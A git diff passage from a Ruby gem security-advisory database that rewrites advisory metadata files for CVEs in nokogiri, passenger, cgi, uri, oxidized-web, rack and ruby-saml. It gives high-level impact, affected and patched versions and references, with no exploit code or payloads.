-    [v2.13.6](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.13.6).
-
-    libxml2 v2.13.6 addresses:
-
-    - CVE-2025-24928
-      - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/847
-    - CVE-2024-56171
-       - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/828
-
-    ## Impact
-
-    ### CVE-2025-24928
-
-    Stack-buffer overflow is possible when reporting DTD validation
-    errors if the input contains a long (~3kb) QName prefix.
-
-    ### CVE-2024-56171
-
-    Use-after-free is possible during validation against untrusted
-    XML Schemas (.xsd) and, potentially, validation of untrusted documents
-    against trusted Schemas if they make use of `xsd:keyref` in combination
-    with recursively defined types that have additional identity constraints.
-  patched_versions:
-  - ">= 1.18.3"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vvfq-8hwr-qm4m
-    - https://github.com/advisories/GHSA-vvfq-8hwr-qm4m
----
+---
+layout: advisory
+title: 'GHSA-vvfq-8hwr-qm4m (nokogiri): Nokogiri updates packaged libxml2 to 2.13.6
+  to resolve CVE-2025-24928 and CVE-2024-56171'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: vvfq-8hwr-qm4m
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vvfq-8hwr-qm4m
+  title: Nokogiri updates packaged libxml2 to 2.13.6 to resolve CVE-2025-24928 and
+    CVE-2024-56171
+  date: 2025-02-18
+  description: |
+    ## Summary
+
+    Nokogiri v1.18.3 upgrades its dependency libxml2 to
+    [v2.13.6](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.13.6).
+
+    libxml2 v2.13.6 addresses:
+
+    - CVE-2025-24928
+      - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/847
+    - CVE-2024-56171
+       - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/828
+
+    ## Impact
+
+    ### CVE-2025-24928
+
+    Stack-buffer overflow is possible when reporting DTD validation
+    errors if the input contains a long (~3kb) QName prefix.
+
+    ### CVE-2024-56171
+
+    Use-after-free is possible during validation against untrusted
+    XML Schemas (.xsd) and, potentially, validation of untrusted documents
+    against trusted Schemas if they make use of `xsd:keyref` in combination
+    with recursively defined types that have additional identity constraints.
+  patched_versions:
+  - ">= 1.18.3"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vvfq-8hwr-qm4m
+    - https://github.com/advisories/GHSA-vvfq-8hwr-qm4m
+---
diff --git a/advisories/_posts/2025-02-24-CVE-2025-26803.md b/advisories/_posts/2025-02-24-CVE-2025-26803.md
index 1e8b696a..e3cd934b 100644
--- a/advisories/_posts/2025-02-24-CVE-2025-26803.md
+++ b/advisories/_posts/2025-02-24-CVE-2025-26803.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2025-26803 (passenger): Phusion Passenger denial of service'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2025-26803
-  ghsa: 2cj2-qqxj-5m3r
-  url: https://github.com/advisories/GHSA-2cj2-qqxj-5m3r
-  title: Phusion Passenger denial of service
-  date: 2025-02-24
-  description: |
-    The http parser in Phusion Passenger 6.0.21 through 6.0.25
-    before 6.0.26 allows a denial of service during parsing of
-    a request with an invalid HTTP method.
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 6.0.21"
-  patched_versions:
-  - ">= 6.0.26"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-26803
-    - https://blog.phusion.nl/2025/02/19/passenger-6-0-26
-    - https://github.com/phusion/passenger/compare/release-6.0.25...release-6.0.26
-    - https://github.com/phusion/passenger/releases/tag/release-6.0.26
-    - https://github.com/phusion/passenger/commit/bb15591646687064ab2d578d5f9660b2a4168017
-    - https://www.phusionpassenger.com/support
-    - https://github.com/advisories/GHSA-2cj2-qqxj-5m3r
----
+---
+layout: advisory
+title: 'CVE-2025-26803 (passenger): Phusion Passenger denial of service'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2025-26803
+  ghsa: 2cj2-qqxj-5m3r
+  url: https://github.com/advisories/GHSA-2cj2-qqxj-5m3r
+  title: Phusion Passenger denial of service
+  date: 2025-02-24
+  description: |
+    The http parser in Phusion Passenger 6.0.21 through 6.0.25
+    before 6.0.26 allows a denial of service during parsing of
+    a request with an invalid HTTP method.
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 6.0.21"
+  patched_versions:
+  - ">= 6.0.26"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-26803
+    - https://blog.phusion.nl/2025/02/19/passenger-6-0-26
+    - https://github.com/phusion/passenger/compare/release-6.0.25...release-6.0.26
+    - https://github.com/phusion/passenger/releases/tag/release-6.0.26
+    - https://github.com/phusion/passenger/commit/bb15591646687064ab2d578d5f9660b2a4168017
+    - https://www.phusionpassenger.com/support
+    - https://github.com/advisories/GHSA-2cj2-qqxj-5m3r
+---
diff --git a/advisories/_posts/2025-02-26-CVE-2025-27219.md b/advisories/_posts/2025-02-26-CVE-2025-27219.md
index 0b290320..da8f1732 100644
--- a/advisories/_posts/2025-02-26-CVE-2025-27219.md
+++ b/advisories/_posts/2025-02-26-CVE-2025-27219.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2025-27219 (cgi): CVE-2025-27219 - Denial of Service in CGI::Cookie.parse'
-comments: false
-categories:
-- cgi
-advisory:
-  gem: cgi
-  cve: 2025-27219
-  ghsa: gh9q-2xrm-x6qv
-  url: https://www.cve.org/CVERecord?id=CVE-2025-27219
-  title: CVE-2025-27219 - Denial of Service in CGI::Cookie.parse
-  date: 2025-02-26
-  description: |
-    There is a possibility for DoS by in the cgi gem.
-    This vulnerability has been assigned the CVE identifier
-    CVE-2025-27219. We recommend upgrading the cgi gem.
-
-    ## Details
-
-    CGI::Cookie.parse took super-linear time to parse a cookie string
-    in some cases. Feeding a maliciously crafted cookie string into
-    the method could lead to a Denial of Service.
-
-    Please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later.
-
-    ## Affected versions
-
-    cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1.
-
-    ## Credits
-
-    Thanks to lio346 for discovering this issue.
-    Also thanks to mame for fixing this vulnerability.
-  cvss_v3: 5.8
-  patched_versions:
-  - "~> 0.3.5.1"
-  - "~> 0.3.7"
-  - ">= 0.4.2"
-  related:
-    url:
-    - https://www.cve.org/CVERecord?id=CVE-2025-27219
-    - https://www.suse.com/security/cve/CVE-2025-27219.html
-    - https://hackerone.com/reports/3013913
-    - https://www.ruby-lang.org/en/news/2025/02/26/security-advisories
----
+---
+layout: advisory
+title: 'CVE-2025-27219 (cgi): CVE-2025-27219 - Denial of Service in CGI::Cookie.parse'
+comments: false
+categories:
+- cgi
+advisory:
+  gem: cgi
+  cve: 2025-27219
+  ghsa: gh9q-2xrm-x6qv
+  url: https://www.cve.org/CVERecord?id=CVE-2025-27219
+  title: CVE-2025-27219 - Denial of Service in CGI::Cookie.parse
+  date: 2025-02-26
+  description: |
+    There is a possibility for DoS by in the cgi gem.
+    This vulnerability has been assigned the CVE identifier
+    CVE-2025-27219. We recommend upgrading the cgi gem.
+
+    ## Details
+
+    CGI::Cookie.parse took super-linear time to parse a cookie string
+    in some cases. Feeding a maliciously crafted cookie string into
+    the method could lead to a Denial of Service.
+
+    Please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later.
+
+    ## Affected versions
+
+    cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1.
+
+    ## Credits
+
+    Thanks to lio346 for discovering this issue.
+    Also thanks to mame for fixing this vulnerability.
+  cvss_v3: 5.8
+  patched_versions:
+  - "~> 0.3.5.1"
+  - "~> 0.3.7"
+  - ">= 0.4.2"
+  related:
+    url:
+    - https://www.cve.org/CVERecord?id=CVE-2025-27219
+    - https://www.suse.com/security/cve/CVE-2025-27219.html
+    - https://hackerone.com/reports/3013913
+    - https://www.ruby-lang.org/en/news/2025/02/26/security-advisories
+---
diff --git a/advisories/_posts/2025-02-26-CVE-2025-27220.md b/advisories/_posts/2025-02-26-CVE-2025-27220.md
index 9f83ec3b..96ca7513 100644
--- a/advisories/_posts/2025-02-26-CVE-2025-27220.md
+++ b/advisories/_posts/2025-02-26-CVE-2025-27220.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2025-27220 (cgi): CVE-2025-27220 - ReDoS in CGI::Util#escapeElement.'
-comments: false
-categories:
-- cgi
-advisory:
-  gem: cgi
-  cve: 2025-27220
-  ghsa: mhwm-jh88-3gjf
-  url: https://www.cve.org/CVERecord?id=CVE-2025-27220
-  title: CVE-2025-27220 - ReDoS in CGI::Util#escapeElement.
-  date: 2025-02-26
-  description: |
-    There is a possibility for Regular expression Denial of Service (ReDoS)
-    by in the cgi gem. This vulnerability has been assigned the CVE
-    identifier CVE-2025-27220. We recommend upgrading the cgi gem.
-
-    ## Details
-
-    The regular expression used in CGI::Util#escapeElement is vulnerable
-    to ReDoS. The crafted input could lead to a high CPU consumption.
-
-    This vulnerability only affects Ruby 3.1 and 3.2. If you
-    are using these versions, please update CGI gem to version
-    0.3.5.1, 0.3.7, 0.4.2 or later.
-
-    ## Affected versions
-
-    cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1.
-
-    ## Credits
-
-    Thanks to svalkanov for discovering this issue.
-    Also thanks to nobu for fixing this vulnerability.
-  cvss_v3: 4.0
-  patched_versions:
-  - "~> 0.3.5.1"
-  - "~> 0.3.7"
-  - ">= 0.4.2"
-  related:
-    url:
-    - https://www.cve.org/CVERecord?id=CVE-2025-27220
-    - https://www.ruby-lang.org/en/news/2025/02/26/security-advisories
----
+---
+layout: advisory
+title: 'CVE-2025-27220 (cgi): CVE-2025-27220 - ReDoS in CGI::Util#escapeElement.'
+comments: false
+categories:
+- cgi
+advisory:
+  gem: cgi
+  cve: 2025-27220
+  ghsa: mhwm-jh88-3gjf
+  url: https://www.cve.org/CVERecord?id=CVE-2025-27220
+  title: CVE-2025-27220 - ReDoS in CGI::Util#escapeElement.
+  date: 2025-02-26
+  description: |
+    There is a possibility for Regular expression Denial of Service (ReDoS)
+    by in the cgi gem. This vulnerability has been assigned the CVE
+    identifier CVE-2025-27220. We recommend upgrading the cgi gem.
+
+    ## Details
+
+    The regular expression used in CGI::Util#escapeElement is vulnerable
+    to ReDoS. The crafted input could lead to a high CPU consumption.
+
+    This vulnerability only affects Ruby 3.1 and 3.2. If you
+    are using these versions, please update CGI gem to version
+    0.3.5.1, 0.3.7, 0.4.2 or later.
+
+    ## Affected versions
+
+    cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1.
+
+    ## Credits
+
+    Thanks to svalkanov for discovering this issue.
+    Also thanks to nobu for fixing this vulnerability.
+  cvss_v3: 4.0
+  patched_versions:
+  - "~> 0.3.5.1"
+  - "~> 0.3.7"
+  - ">= 0.4.2"
+  related:
+    url:
+    - https://www.cve.org/CVERecord?id=CVE-2025-27220
+    - https://www.ruby-lang.org/en/news/2025/02/26/security-advisories
+---
diff --git a/advisories/_posts/2025-02-26-CVE-2025-27221.md b/advisories/_posts/2025-02-26-CVE-2025-27221.md
index bf37aa4b..c6dcff25 100644
--- a/advisories/_posts/2025-02-26-CVE-2025-27221.md
+++ b/advisories/_posts/2025-02-26-CVE-2025-27221.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2025-27221 (uri): CVE-2025-27221 - userinfo leakage in URI#join, URI#merge
-  and URI#+.'
-comments: false
-categories:
-- uri
-advisory:
-  gem: uri
-  cve: 2025-27221
-  ghsa: 22h5-pq3x-2gf2
-  url: https://www.cve.org/CVERecord?id=CVE-2025-27221
-  title: CVE-2025-27221 - userinfo leakage in URI#join, URI#merge and URI#+.
-  date: 2025-02-26
-  description: |2
-
-    There is a possibility for userinfo leakage by in the uri gem.
-    This vulnerability has been assigned the CVE identifier
-    CVE-2025-27221. We recommend upgrading the uri gem.
-
-    ## Details
-
-    The methods URI#join, URI#merge, and URI#+ retained userinfo, such
-    as user:password, even after the host is replaced. When generating
-    a URL to a malicious host from a URL containing secret userinfo
-    using these methods, and having someone access that URL, an
-    unintended userinfo leak could occur.
-
-    Please update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later.
-
-    ## Affected versions
-
-    uri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and
-    1.0.0 to 1.0.2.
-
-    ## Credits
-
-    Thanks to Tsubasa Irisawa (lambdasawa) for discovering this issue.
-    Also thanks to nobu for additional fixes of this vulnerability.
-  cvss_v3: 5.3
-  patched_versions:
-  - "~> 0.11.3"
-  - "~> 0.12.4"
-  - "~> 0.13.2"
-  - ">= 1.0.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-27221
-    - https://www.cve.org/CVERecord?id=CVE-2025-27221
-    - https://www.ruby-lang.org/en/news/2025/02/26/security-advisories
-    - https://github.com/advisories/GHSA-22h5-pq3x-2gf2
----
+---
+layout: advisory
+title: 'CVE-2025-27221 (uri): CVE-2025-27221 - userinfo leakage in URI#join, URI#merge
+  and URI#+.'
+comments: false
+categories:
+- uri
+advisory:
+  gem: uri
+  cve: 2025-27221
+  ghsa: 22h5-pq3x-2gf2
+  url: https://www.cve.org/CVERecord?id=CVE-2025-27221
+  title: CVE-2025-27221 - userinfo leakage in URI#join, URI#merge and URI#+.
+  date: 2025-02-26
+  description: |2
+
+    There is a possibility for userinfo leakage by in the uri gem.
+    This vulnerability has been assigned the CVE identifier
+    CVE-2025-27221. We recommend upgrading the uri gem.
+
+    ## Details
+
+    The methods URI#join, URI#merge, and URI#+ retained userinfo, such
+    as user:password, even after the host is replaced. When generating
+    a URL to a malicious host from a URL containing secret userinfo
+    using these methods, and having someone access that URL, an
+    unintended userinfo leak could occur.
+
+    Please update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later.
+
+    ## Affected versions
+
+    uri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and
+    1.0.0 to 1.0.2.
+
+    ## Credits
+
+    Thanks to Tsubasa Irisawa (lambdasawa) for discovering this issue.
+    Also thanks to nobu for additional fixes of this vulnerability.
+  cvss_v3: 5.3
+  patched_versions:
+  - "~> 0.11.3"
+  - "~> 0.12.4"
+  - "~> 0.13.2"
+  - ">= 1.0.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-27221
+    - https://www.cve.org/CVERecord?id=CVE-2025-27221
+    - https://www.ruby-lang.org/en/news/2025/02/26/security-advisories
+    - https://github.com/advisories/GHSA-22h5-pq3x-2gf2
+---
diff --git a/advisories/_posts/2025-03-03-CVE-2025-27590.md b/advisories/_posts/2025-03-03-CVE-2025-27590.md
index 251b1e06..61409aa0 100644
--- a/advisories/_posts/2025-03-03-CVE-2025-27590.md
+++ b/advisories/_posts/2025-03-03-CVE-2025-27590.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2025-27590 (oxidized-web): Oxidized Web RANCID migration page allows unauthenticated
-  user to gain control over Linux user account'
-comments: false
-categories:
-- oxidized-web
-advisory:
-  gem: oxidized-web
-  cve: 2025-27590
-  ghsa: jx6p-9c26-g373
-  url: https://github.com/advisories/GHSA-jx6p-9c26-g373
-  title: Oxidized Web RANCID migration page allows unauthenticated user to gain control
-    over Linux user account
-  date: 2025-03-03
-  description: |
-    In oxidized-web (aka Oxidized Web) before 0.15.0, the RANCID
-    migration page allows an unauthenticated user to gain control
-    over the Linux user account that is running oxidized-web.
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 0.15.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-27590
-    - https://github.com/ytti/oxidized-web/releases/tag/0.15.0
-    - https://github.com/ytti/oxidized-web/commit/a5220a0ddc57b85cd122bffee228d3ed4901668e
-    - https://github.com/advisories/GHSA-jx6p-9c26-g373
----
+---
+layout: advisory
+title: 'CVE-2025-27590 (oxidized-web): Oxidized Web RANCID migration page allows unauthenticated
+  user to gain control over Linux user account'
+comments: false
+categories:
+- oxidized-web
+advisory:
+  gem: oxidized-web
+  cve: 2025-27590
+  ghsa: jx6p-9c26-g373
+  url: https://github.com/advisories/GHSA-jx6p-9c26-g373
+  title: Oxidized Web RANCID migration page allows unauthenticated user to gain control
+    over Linux user account
+  date: 2025-03-03
+  description: |
+    In oxidized-web (aka Oxidized Web) before 0.15.0, the RANCID
+    migration page allows an unauthenticated user to gain control
+    over the Linux user account that is running oxidized-web.
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 0.15.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-27590
+    - https://github.com/ytti/oxidized-web/releases/tag/0.15.0
+    - https://github.com/ytti/oxidized-web/commit/a5220a0ddc57b85cd122bffee228d3ed4901668e
+    - https://github.com/advisories/GHSA-jx6p-9c26-g373
+---
diff --git a/advisories/_posts/2025-03-04-CVE-2025-27111.md b/advisories/_posts/2025-03-04-CVE-2025-27111.md
index 332ba56d..3e13138a 100644
--- a/advisories/_posts/2025-03-04-CVE-2025-27111.md
+++ b/advisories/_posts/2025-03-04-CVE-2025-27111.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2025-27111 (rack): Escape Sequence Injection vulnerability in Rack lead
-  to Possible Log Injection'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-27111
-  ghsa: 8cgq-6mh2-7j6v
-  url: https://github.com/rack/rack/security/advisories/GHSA-8cgq-6mh2-7j6v
-  title: Escape Sequence Injection vulnerability in Rack lead to Possible Log Injection
-  date: 2025-03-04
-  description: |
-    ## Summary
-
-    `Rack::Sendfile` can be exploited by crafting input that
-    includes newline characters to manipulate log entries.
-
-    ## Details
-
-    The `Rack::Sendfile` middleware logs unsanitized header values from
-    the `X-Sendfile-Type` header. An attacker can exploit this by
-    injecting escape sequences (such as newline characters) into the
-    header, resulting in log injection.
-
-    ## Impact
-
-    This vulnerability can distort log files, obscure
-    attack traces, and complicate security auditing.
-
-    ## Mitigation
-
-    - Update to the latest version of Rack, or
-    - Remove usage of `Rack::Sendfile`.
-  cvss_v4: 6.9
-  patched_versions:
-  - "~> 2.2.12"
-  - "~> 3.0.13"
-  - ">= 3.1.11"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-27111
-    - https://github.com/rack/rack/security/advisories/GHSA-8cgq-6mh2-7j6v
-    - https://github.com/rack/rack/commit/803aa221e8302719715e224f4476e438f2531a53
-    - https://github.com/rack/rack/commit/aeac570bb8080ca7b53b7f2e2f67498be7ebd30b
-    - https://github.com/rack/rack/commit/b13bc6bfc7506aca3478dc5ac1c2ec6fc53f82a3
-    - https://github.com/advisories/GHSA-8cgq-6mh2-7j6v
----
+---
+layout: advisory
+title: 'CVE-2025-27111 (rack): Escape Sequence Injection vulnerability in Rack lead
+  to Possible Log Injection'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-27111
+  ghsa: 8cgq-6mh2-7j6v
+  url: https://github.com/rack/rack/security/advisories/GHSA-8cgq-6mh2-7j6v
+  title: Escape Sequence Injection vulnerability in Rack lead to Possible Log Injection
+  date: 2025-03-04
+  description: |
+    ## Summary
+
+    `Rack::Sendfile` can be exploited by crafting input that
+    includes newline characters to manipulate log entries.
+
+    ## Details
+
+    The `Rack::Sendfile` middleware logs unsanitized header values from
+    the `X-Sendfile-Type` header. An attacker can exploit this by
+    injecting escape sequences (such as newline characters) into the
+    header, resulting in log injection.
+
+    ## Impact
+
+    This vulnerability can distort log files, obscure
+    attack traces, and complicate security auditing.
+
+    ## Mitigation
+
+    - Update to the latest version of Rack, or
+    - Remove usage of `Rack::Sendfile`.
+  cvss_v4: 6.9
+  patched_versions:
+  - "~> 2.2.12"
+  - "~> 3.0.13"
+  - ">= 3.1.11"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-27111
+    - https://github.com/rack/rack/security/advisories/GHSA-8cgq-6mh2-7j6v
+    - https://github.com/rack/rack/commit/803aa221e8302719715e224f4476e438f2531a53
+    - https://github.com/rack/rack/commit/aeac570bb8080ca7b53b7f2e2f67498be7ebd30b
+    - https://github.com/rack/rack/commit/b13bc6bfc7506aca3478dc5ac1c2ec6fc53f82a3
+    - https://github.com/advisories/GHSA-8cgq-6mh2-7j6v
+---
diff --git a/advisories/_posts/2025-03-10-CVE-2025-27610.md b/advisories/_posts/2025-03-10-CVE-2025-27610.md
index db9ad5d9..736b861b 100644
--- a/advisories/_posts/2025-03-10-CVE-2025-27610.md
+++ b/advisories/_posts/2025-03-10-CVE-2025-27610.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2025-27610 (rack): Local File Inclusion in Rack::Static'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-27610
-  ghsa: 7wqh-767x-r66v
-  url: https://github.com/rack/rack/security/advisories/GHSA-7wqh-767x-r66v
-  title: Local File Inclusion in Rack::Static
-  date: 2025-03-10
-  description: |-
-    ## Summary
-
-    `Rack::Static` can serve files under the specified `root:` even if `urls:` are provided, which may expose other files under the specified `root:` unexpectedly.
-
-    ## Details
-
-    The vulnerability occurs because `Rack::Static` does not properly sanitize user-supplied paths before serving files. Specifically, encoded path traversal sequences are not correctly validated, allowing attackers to access files outside the designated static file directory.
-
-    ## Impact
-
-    By exploiting this vulnerability, an attacker can gain access to all files under the specified `root:` directory, provided they are able to determine then path of the file.
-
-    ## Mitigation
-
-    - Update to the latest version of Rack, or
-    - Remove usage of `Rack::Static`, or
-    - Ensure that `root:` points at a directory path which only contains files which should be accessed publicly.
-
-    It is likely that a CDN or similar static file server would also mitigate the issue.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.13"
-  - "~> 3.0.14"
-  - ">= 3.1.12"
-  related:
-    url:
-    - https://github.com/rack/rack/security/advisories/GHSA-7wqh-767x-r66v
-    - https://github.com/rack/rack/commit/50caab74fa01ee8f5dbdee7bb2782126d20c6583
-    - https://github.com/advisories/GHSA-7wqh-767x-r66v
----
+---
+layout: advisory
+title: 'CVE-2025-27610 (rack): Local File Inclusion in Rack::Static'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-27610
+  ghsa: 7wqh-767x-r66v
+  url: https://github.com/rack/rack/security/advisories/GHSA-7wqh-767x-r66v
+  title: Local File Inclusion in Rack::Static
+  date: 2025-03-10
+  description: |-
+    ## Summary
+
+    `Rack::Static` can serve files under the specified `root:` even if `urls:` are provided, which may expose other files under the specified `root:` unexpectedly.
+
+    ## Details
+
+    The vulnerability occurs because `Rack::Static` does not properly sanitize user-supplied paths before serving files. Specifically, encoded path traversal sequences are not correctly validated, allowing attackers to access files outside the designated static file directory.
+
+    ## Impact
+
+    By exploiting this vulnerability, an attacker can gain access to all files under the specified `root:` directory, provided they are able to determine then path of the file.
+
+    ## Mitigation
+
+    - Update to the latest version of Rack, or
+    - Remove usage of `Rack::Static`, or
+    - Ensure that `root:` points at a directory path which only contains files which should be accessed publicly.
+
+    It is likely that a CDN or similar static file server would also mitigate the issue.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.13"
+  - "~> 3.0.14"
+  - ">= 3.1.12"
+  related:
+    url:
+    - https://github.com/rack/rack/security/advisories/GHSA-7wqh-767x-r66v
+    - https://github.com/rack/rack/commit/50caab74fa01ee8f5dbdee7bb2782126d20c6583
+    - https://github.com/advisories/GHSA-7wqh-767x-r66v
+---
diff --git a/advisories/_posts/2025-03-12-CVE-2025-25291.md b/advisories/_posts/2025-03-12-CVE-2025-25291.md
index 85bf15e0..d39e17b2 100644
--- a/advisories/_posts/2025-03-12-CVE-2025-25291.md
+++ b/advisories/_posts/2025-03-12-CVE-2025-25291.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2025-25291 (ruby-saml): Ruby SAML allows a SAML authentication bypass
-  due to DOCTYPE handling (parser differential)'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2025-25291
-  ghsa: 4vc4-m8qh-g8jm
-  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm
-  title: Ruby SAML allows a SAML authentication bypass due to DOCTYPE handling (parser
-    differential)
-  date: 2025-03-12
-  description: |-
-    ### Summary
-    An authentication bypass vulnerability was found in ruby-saml due to a parser differential.
-    ReXML and Nokogiri parse XML differently, the parsers can generate entirely
-    different document structures from the same XML input. That allows an attacker
-    to be able to execute a Signature Wrapping attack.
-
-    ### Impact
-    This issue may lead to authentication bypass.
-  cvss_v3: 9.8
-  cvss_v4: 8.8
-  patched_versions:
-  - "~> 1.12.4"
-  - ">= 1.18.0"
-  related:
-    url:
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97
-    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-25291
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9
-    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
-    - https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0
-    - https://github.com/advisories/GHSA-4vc4-m8qh-g8jm
----
+---
+layout: advisory
+title: 'CVE-2025-25291 (ruby-saml): Ruby SAML allows a SAML authentication bypass
+  due to DOCTYPE handling (parser differential)'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2025-25291
+  ghsa: 4vc4-m8qh-g8jm
+  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm
+  title: Ruby SAML allows a SAML authentication bypass due to DOCTYPE handling (parser
+    differential)
+  date: 2025-03-12
+  description: |-
+    ### Summary
+    An authentication bypass vulnerability was found in ruby-saml due to a parser differential.
+    ReXML and Nokogiri parse XML differently, the parsers can generate entirely
+    different document structures from the same XML input. That allows an attacker
+    to be able to execute a Signature Wrapping attack.
+
+    ### Impact
+    This issue may lead to authentication bypass.
+  cvss_v3: 9.8
+  cvss_v4: 8.8
+  patched_versions:
+  - "~> 1.12.4"
+  - ">= 1.18.0"
+  related:
+    url:
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97
+    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-25291
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9
+    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
+    - https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0
+    - https://github.com/advisories/GHSA-4vc4-m8qh-g8jm
+---
diff --git a/advisories/_posts/2025-03-12-CVE-2025-25292.md b/advisories/_posts/2025-03-12-CVE-2025-25292.md
index 29ed3432..21200887 100644
--- a/advisories/_posts/2025-03-12-CVE-2025-25292.md
+++ b/advisories/_posts/2025-03-12-CVE-2025-25292.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2025-25292 (ruby-saml): Ruby SAML allows a SAML authentication bypass
-  due to namespace handling (parser differential)'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2025-25292
-  ghsa: 754f-8gm6-c4r2
-  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2
-  title: Ruby SAML allows a SAML authentication bypass due to namespace handling (parser
-    differential)
-  date: 2025-03-12
-  description: |-
-    ### Summary
-    An authentication bypass vulnerability was found in ruby-saml due to a parser differential.
-    ReXML and Nokogiri parse XML differently, the parsers can generate entirely
-    different document structures from the same XML input. That allows an
-    attacker to be able to execute a Signature Wrapping attack.
-
-    ### Impact
-    This issue may lead to authentication bypass.
-  cvss_v3: 9.8
-  cvss_v4: 8.8
-  patched_versions:
-  - "~> 1.12.4"
-  - ">= 1.18.0"
-  related:
-    url:
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2
-    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97
-    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-25292
